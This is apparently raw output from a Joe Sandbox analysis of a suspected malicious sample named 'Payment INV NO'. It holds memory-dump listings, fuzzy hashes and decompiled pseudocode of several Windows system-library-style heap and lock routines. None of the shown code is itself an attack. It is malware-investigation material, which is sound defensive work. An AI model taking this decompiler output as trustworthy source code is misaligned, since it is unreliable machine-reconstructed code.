                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12e37cded02dd4bd6cbbf5eccdaa54ea3a9f7d6fd69cf726fee8976191310503
                                                          • Instruction ID: 0c81cd7e7771bdf695385fbbcec8ff1c47f12bcbbad8683be7d0b69d746c8f7e
                                                          • Opcode Fuzzy Hash: 12e37cded02dd4bd6cbbf5eccdaa54ea3a9f7d6fd69cf726fee8976191310503
                                                          • Instruction Fuzzy Hash: 7011C471A00209EFD721DF69C844B99FBF8EF54754F1484AAEA49E7211E771E900CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CDF4C Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E017CDF4C(signed int __eax, signed char __ecx, signed int* __edx, signed int* _a4) {
				char _v8;
				signed int _v32;
				signed int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v49;
				void* _v50;
				void* __ebx;
				void* __edi;
				intOrPtr* _t71;
				signed int _t74;
				signed int _t75;
				intOrPtr _t80;
				intOrPtr* _t81;
				signed int _t87;
				signed int* _t92;
				signed int* _t99;
				signed int _t102;
				signed int _t104;
				unsigned int _t109;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr* _t119;
				char _t124;
				signed int _t125;
				signed int _t130;
				signed int _t132;
				void* _t134;
				signed int _t136;
				signed int _t137;
				intOrPtr* _t138;
				signed char _t141;
				signed int _t144;
				signed int _t146;
				signed int _t150;
				void* _t152;

				_push(__ecx);
				_push(__ecx);
				_push(_t134);
				_t94 = __edx;
				_t141 = __ecx;
				asm("lock xadd [esi+0x2c], eax");
				if((__eax | 0xffffffff) == 1) {
					_t108 =  *((intOrPtr*)(__ecx + 0x28));
					if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
						E0179A745(__edx, _t108, __edx, _t134);
					}
					_t71 = _t141 + 4;
					_t124 =  *_t71;
					if( *((intOrPtr*)(_t124 + 4)) != _t71) {
						L9:
						_t109 = 3;
						asm("int 0x29");
						_t152 = (_t150 & 0xfffffff8) - 0x1c;
						_v36 = _v36 & 0x00000000;
						_push(_t94);
						 *((char*)(_t152 + 0xb)) = _t124;
						 *(_t152 + 0x18) = _t109;
						_push(_t141);
						_push(_t134);
						_t99 =  *((intOrPtr*)( *[fs:0x18] + 0x30)) + ((_t109 >> 0x00000005 & 0x0000007f) + 0x97) * 4;
						_t74 = 0;
						_t125 =  *_t99;
						 *(_t152 + 0x1c) = _t99;
						 *(_t152 + 0x12) = 0;
						if(_t125 != 0) {
							while((_t125 & 0x00000001) == 0) {
								_t74 = _t125;
								if((_t125 & 0x00000002) != 0) {
									asm("lock cmpxchg [ebx], ecx");
									if(_t74 != _t125) {
										goto L40;
									}
								} else {
									_t144 = _t125 | 0x00000002;
									asm("lock cmpxchg [ebx], ecx");
									if(_t74 != _t125) {
										L40:
										_t125 = _t74;
										if(_t74 != 0) {
											continue;
										} else {
										}
									} else {
										while(1) {
											L14:
											_t102 = _t144 & 0xfffffffc;
											 *(_t152 + 0x24) = _t102;
											_t136 = _t102;
											if( *((intOrPtr*)(_t102 + 0x10)) == 0) {
												goto L42;
											}
											L15:
											_t137 =  *((intOrPtr*)(_t136 + 0x10));
											 *((intOrPtr*)(_t102 + 0x10)) = _t137;
											while(_t137 != 0) {
												_t130 =  *((intOrPtr*)(_t137 + 0xc));
												_v32 = _t130;
												if( *_t137 !=  *((intOrPtr*)(_t152 + 0x20))) {
													L46:
													_t137 = _t130;
													continue;
												} else {
													_t114 =  *(_t137 + 8);
													if(_t137 != _t102) {
														 *(_t130 + 8) = _t114;
														_t115 =  *(_t137 + 8);
														_t80 =  *((intOrPtr*)(_t137 + 0xc));
														if(_t115 != 0) {
															 *((intOrPtr*)(_t115 + 0xc)) = _t80;
														} else {
															 *((intOrPtr*)(_t102 + 0x10)) = _t80;
															 *((intOrPtr*)( *((intOrPtr*)(_t137 + 0xc)) + 0x10)) =  *((intOrPtr*)(_t137 + 0xc));
														}
														goto L23;
													} else {
														if(_t114 != 0) {
															_t114 = _t114 ^ (_t114 ^ _t144) & 0x00000003;
														}
														_t87 = _t144;
														asm("lock cmpxchg [ebx], edx");
														_t102 =  *(_t152 + 0x24);
														if(_t87 != _t144) {
															_t144 = _t87;
															goto L14;
														} else {
															_t132 =  *(_t137 + 8);
															_t118 = _t114 & 0xffffff00 | _t114 == 0x00000000;
															 *(_t152 + 0x12) = _t118;
															if(_t132 != 0) {
																 *(_t132 + 0xc) =  *(_t132 + 0xc) & 0x00000000;
																 *((intOrPtr*)(_t132 + 0x10)) =  *((intOrPtr*)(_t137 + 0x10));
																 *(_t152 + 0x12) = _t118;
															}
															_t130 = _v32;
															L23:
															_t116 = 2;
															_t81 = _t137 + 0x14;
															_t117 =  *_t81;
															 *_t81 = _t116;
															if(_t117 == 2) {
																goto L46;
															} else {
																if(_t117 == 0) {
																	 *(_t137 + 8) = _v36;
																	_v36 = _t137;
																}
																if( *((char*)(_t152 + 0x13)) != 0) {
																	goto L46;
																}
															}
														}
													}
												}
												break;
											}
											_t74 = _v36;
											if(_t74 != 0) {
												do {
													_push( *((intOrPtr*)(_t74 + 4)));
													_t146 =  *(_t74 + 8);
													E017D9BF0();
													_t74 = _t146;
												} while (_t146 != 0);
											}
											if( *(_t152 + 0x12) == 0) {
												_t113 =  *( *(_t152 + 0x1c));
												while(1) {
													_t104 = _t113 & 0x00000001;
													asm("sbb edx, edx");
													_t74 = _t113;
													asm("lock cmpxchg [esi], edx");
													if(_t74 == _t113) {
														break;
													}
													_t113 = _t74;
												}
												if(_t104 != 0) {
													_t74 = L0184CF30(_t74);
												}
											}
											goto L30;
											do {
												L42:
												_t75 = _t136;
												_t136 =  *(_t136 + 8);
												 *(_t136 + 0xc) = _t75;
											} while ( *((intOrPtr*)(_t136 + 0x10)) == 0);
											goto L15;
										}
									}
								}
								goto L30;
							}
						}
						L30:
						return _t74;
					} else {
						_t119 =  *((intOrPtr*)(_t71 + 4));
						if( *_t119 != _t71) {
							goto L9;
						} else {
							 *_t119 = _t124;
							 *((intOrPtr*)(_t124 + 4)) = _t119;
							_t138 =  *((intOrPtr*)(_t141 + 0x30));
							 *_t94 =  *((intOrPtr*)(_t141 + 0x38));
							 *_a4 =  *(_t141 + 0x3c);
							_t92 = E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t141);
							if(_t138 != 0) {
								 *_t138 = 1;
								_t92 =  &_v8;
								asm("lock or [eax], ecx");
								_push(0);
								L10();
							}
							goto L2;
						}
					}
				} else {
					_t92 = _a4;
					 *__edx =  *__edx & 0x00000000;
					 *_t92 =  *_t92 & 0x00000000;
					L2:
					return _t92;
				}
			}












































                                                          0x017cdf51
                                                          0x017cdf52
                                                          0x017cdf55
                                                          0x017cdf56
                                                          0x017cdf58
                                                          0x017cdf5d
                                                          0x017cdf63
                                                          0x017cdf77
                                                          0x017cdf7c
                                                          0x017cdfd3
                                                          0x017cdfd3
                                                          0x017cdf7e
                                                          0x017cdf81
                                                          0x017cdf86
                                                          0x017cdfda
                                                          0x017cdfdc
                                                          0x017cdfdd
                                                          0x017cdfe7
                                                          0x017cdff0
                                                          0x017cdff5
                                                          0x017cdff8
                                                          0x017ce005
                                                          0x017ce00f
                                                          0x017ce010
                                                          0x017ce011
                                                          0x017ce014
                                                          0x017ce016
                                                          0x017ce018
                                                          0x017ce01c
                                                          0x017ce022
                                                          0x017ce028
                                                          0x017ce031
                                                          0x017ce036
                                                          0x0180b47d
                                                          0x0180b483
                                                          0x00000000
                                                          0x00000000
                                                          0x017ce03c
                                                          0x017ce03e
                                                          0x017ce043
                                                          0x017ce049
                                                          0x0180b489
                                                          0x0180b489
                                                          0x0180b48d
                                                          0x00000000
                                                          0x00000000
                                                          0x0180b493
                                                          0x00000000
                                                          0x017ce04f
                                                          0x017ce04f
                                                          0x017ce051
                                                          0x017ce054
                                                          0x017ce058
                                                          0x017ce05e
                                                          0x00000000
                                                          0x00000000
                                                          0x017ce064
                                                          0x017ce064
                                                          0x017ce067
                                                          0x017ce06a
                                                          0x017ce076
                                                          0x017ce079
                                                          0x017ce07f
                                                          0x0180b4cc
                                                          0x0180b4cc
                                                          0x00000000
                                                          0x017ce085
                                                          0x017ce085
                                                          0x017ce08a
                                                          0x017ce11c
                                                          0x017ce11f
                                                          0x017ce122
                                                          0x017ce127
                                                          0x017ce164
                                                          0x017ce129
                                                          0x017ce129
                                                          0x017ce12f
                                                          0x017ce12f
                                                          0x00000000
                                                          0x017ce090
                                                          0x017ce092
                                                          0x0180b4b2
                                                          0x0180b4b2
                                                          0x017ce09e
                                                          0x017ce0a0
                                                          0x017ce0a4
                                                          0x017ce0aa
                                                          0x0180b4d3
                                                          0x00000000
                                                          0x017ce0b0
                                                          0x017ce0b0
                                                          0x017ce0b5
                                                          0x017ce0b8
                                                          0x017ce0be
                                                          0x0180b4b9
                                                          0x0180b4c0
                                                          0x0180b4c3
                                                          0x0180b4c3
                                                          0x017ce0c4
                                                          0x017ce0c8
                                                          0x017ce0ca
                                                          0x017ce0cb
                                                          0x017ce0ce
                                                          0x017ce0ce
                                                          0x017ce0d3
                                                          0x00000000
                                                          0x017ce0d9
                                                          0x017ce0db
                                                          0x017ce0e1
                                                          0x017ce0e4
                                                          0x017ce0e4
                                                          0x017ce0ed
                                                          0x00000000
                                                          0x00000000
                                                          0x017ce0ed
                                                          0x017ce0d3
                                                          0x017ce0aa
                                                          0x017ce08a
                                                          0x00000000
                                                          0x017ce07f
                                                          0x017ce0f3
                                                          0x017ce0f9
                                                          0x017ce0fb
                                                          0x017ce0fb
                                                          0x017ce0fe
                                                          0x017ce101
                                                          0x017ce106
                                                          0x017ce108
                                                          0x017ce0fb
                                                          0x017ce111
                                                          0x017ce138
                                                          0x017ce13a
                                                          0x017ce13e
                                                          0x017ce148
                                                          0x017ce14e
                                                          0x017ce150
                                                          0x017ce156
                                                          0x00000000
                                                          0x00000000
                                                          0x017ce16c
                                                          0x017ce16c
                                                          0x017ce15a
                                                          0x017ce15d
                                                          0x017ce15d
                                                          0x017ce15a
                                                          0x00000000
                                                          0x0180b498
                                                          0x0180b498
                                                          0x0180b498
                                                          0x0180b49a
                                                          0x0180b49d
                                                          0x0180b4a0
                                                          0x00000000
                                                          0x0180b4a6
                                                          0x017ce04f
                                                          0x017ce049
                                                          0x00000000
                                                          0x017ce036
                                                          0x017ce028
                                                          0x017ce113
                                                          0x017ce119
                                                          0x017cdf88
                                                          0x017cdf88
                                                          0x017cdf8d
                                                          0x00000000
                                                          0x017cdf8f
                                                          0x017cdf8f
                                                          0x017cdf91
                                                          0x017cdf97
                                                          0x017cdf9a
                                                          0x017cdfa5
                                                          0x017cdfb0
                                                          0x017cdfb7
                                                          0x017cdfb9
                                                          0x017cdfbf
                                                          0x017cdfc4
                                                          0x017cdfc7
                                                          0x017cdfcc
                                                          0x017cdfcc
                                                          0x00000000
                                                          0x017cdfb7
                                                          0x017cdf8d
                                                          0x017cdf65
                                                          0x017cdf65
                                                          0x017cdf68
                                                          0x017cdf6b
                                                          0x017cdf6e
                                                          0x017cdf74
                                                          0x017cdf74

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f28419df6af2d23079d6212a2d07e07d8d0d82000401156087926df4598b4be
                                                          • Instruction ID: f4e11c0042ca5a2a1c5b38b2502b9acce6964f89029e401ffe6dfe10a1f3f764
                                                          • Opcode Fuzzy Hash: 6f28419df6af2d23079d6212a2d07e07d8d0d82000401156087926df4598b4be
                                                          • Instruction Fuzzy Hash: 3A118E712016069FD729DF59C490B66FBF5FF85721F05816DE51A8B6A0E770EC02CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A28FD Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017A28FD(void* __edx, signed int _a4) {
				void* __ecx;
				void* _t8;
				char* _t13;
				signed char* _t17;
				void* _t21;
				void* _t22;
				void* _t28;

				_t28 = __edx;
				_t8 = E017AEB70(_t22, 0x1885350);
				_t23 = _a4;
				_t21 = _t8;
				if( !_a4 >= 0) {
					E0179B1E1(_t23, 0x14a2, _t28, 0);
				}
				if(E017B7D50() != 0) {
					_t13 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
						if(E017B7D50() == 0) {
							_t17 = 0x7ffe0385;
						} else {
							_t17 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t17 & 0x00000020) != 0) {
							L01817016(0x14a2, 0, 0, _t28, 0, 0);
						}
					}
				}
				return _t21;
			}










                                                          0x017a290b
                                                          0x017a290d
                                                          0x017a2912
                                                          0x017a2915
                                                          0x017a291d
                                                          0x017f7758
                                                          0x017f7758
                                                          0x017a292a
                                                          0x017f776b
                                                          0x017a2930
                                                          0x017a2930
                                                          0x017a2930
                                                          0x017a2938
                                                          0x017f7782
                                                          0x017f778f
                                                          0x017f77a1
                                                          0x017f7791
                                                          0x017f779a
                                                          0x017f779a
                                                          0x017f77a9
                                                          0x017f77bd
                                                          0x017f77bd
                                                          0x017f77a9
                                                          0x017f7782
                                                          0x017a2945

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3480538992d4ed137ded8d59deb36898aadec9b8d6bd8f96e6730551dc7d7eba
                                                          • Instruction ID: d103ff8ed24b783922d0904173b2c45bfada5ec0ca18b53b48cde209e1e5123f
                                                          • Opcode Fuzzy Hash: 3480538992d4ed137ded8d59deb36898aadec9b8d6bd8f96e6730551dc7d7eba
                                                          • Instruction Fuzzy Hash: 7E110836358640ABF32A536DCD48F23BB98DFD0B90F540169BA019B3D2DAA4D8008231
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179A63B Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0179A63B(intOrPtr __ecx) {
				signed int _t14;
				signed char _t23;
				signed int _t24;
				intOrPtr _t27;
				void* _t31;
				signed short _t33;
				void* _t38;

				_t27 = __ecx;
				_t33 =  *0x1888498; // 0x0
				 *((short*)(((0 |  *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) - 0x00000001 & 0x00000058) + __ecx + 0x24)) = 0xffff;
				_t38 = _t33 -  *0x1885cb0; // 0x4
				if(_t38 == 0) {
					_t14 =  *0x1885cb0; // 0x4
					 *0x1885cb0 = _t14 + _t14;
					_t31 = E017B4620(0xffff,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, (_t14 + _t14 & 0x0000ffff) << 2);
					if(_t31 != 0) {
						_t33 =  *0x1888498; // 0x0
						E017DF3E0(_t31,  *0x18856f4, (_t33 & 0x0000ffff) << 2);
						_t23 =  *0x18856f4; // 0x771a6640
						if(_t23 != 0x1886640) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t23);
							_t33 =  *0x1888498; // 0x0
						}
						 *0x18856f4 = _t31;
						L2:
						_t24 = _t33 & 0x0000ffff;
						 *0x1888498 = _t33 + 1;
						 *((intOrPtr*)(_t31 + _t24 * 4)) = _t27;
						L3:
						return _t24;
					}
					_t24 =  *0x1888498; // 0x0
					 *0x1885cb0 = _t24;
					goto L3;
				}
				_t31 =  *0x18856f4; // 0x771a6640
				goto L2;
			}










                                                          0x0179a63e
                                                          0x0179a643
                                                          0x0179a65e
                                                          0x0179a663
                                                          0x0179a66a
                                                          0x017f42f5
                                                          0x017f42fc
                                                          0x017f4319
                                                          0x017f431d
                                                          0x017f4330
                                                          0x017f4345
                                                          0x017f434d
                                                          0x017f4357
                                                          0x017f4365
                                                          0x017f436a
                                                          0x017f436a
                                                          0x017f4371
                                                          0x0179a676
                                                          0x0179a676
                                                          0x0179a67b
                                                          0x0179a682
                                                          0x0179a685
                                                          0x0179a688
                                                          0x0179a688
                                                          0x017f431f
                                                          0x017f4325
                                                          0x00000000
                                                          0x017f4325
                                                          0x0179a670
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d93ff7594f9826b982319eebbe4a943000e329b36e63738efc00798ff88b5fd
                                                          • Instruction ID: 9621309a63d03da5234e8fe93ff1d855e859246b15a22c9ae3310197e8059451
                                                          • Opcode Fuzzy Hash: 2d93ff7594f9826b982319eebbe4a943000e329b36e63738efc00798ff88b5fd
                                                          • Instruction Fuzzy Hash: 38119E3B511181EAD3368F1CE980A6A77A5FF85B54B940128E605FB3A9D7358E41CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D3EE4 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E017D3EE4(void* __ecx, void* __edx) {
				char _v8;
				char _v20;
				void* _t51;
				intOrPtr* _t55;
				signed char _t57;

				if( *0x1888644 != 0) {
					L4:
					return 1;
				}
				_t57 = E017B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x28);
				if(_t57 == 0) {
					L7:
					return 0;
				}
				if(E017D3FA0( &_v8, 0x18865d4,  &_v20) < 0) {
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
					goto L7;
				}
				_t55 =  *((intOrPtr*)(_v8 + 0x10)) + _v8;
				_t51 =  *_t55 + _t55;
				 *((short*)(_t57 + 8)) =  *((intOrPtr*)(_t51 + 0x18));
				 *((short*)(_t57 + 0xc)) =  *((intOrPtr*)(_t51 + 0x16));
				 *((short*)(_t57 + 0xa)) =  *((intOrPtr*)(_t51 + 0x20));
				 *((short*)(_t57 + 0x24)) =  *((intOrPtr*)(_t51 + 0x1a));
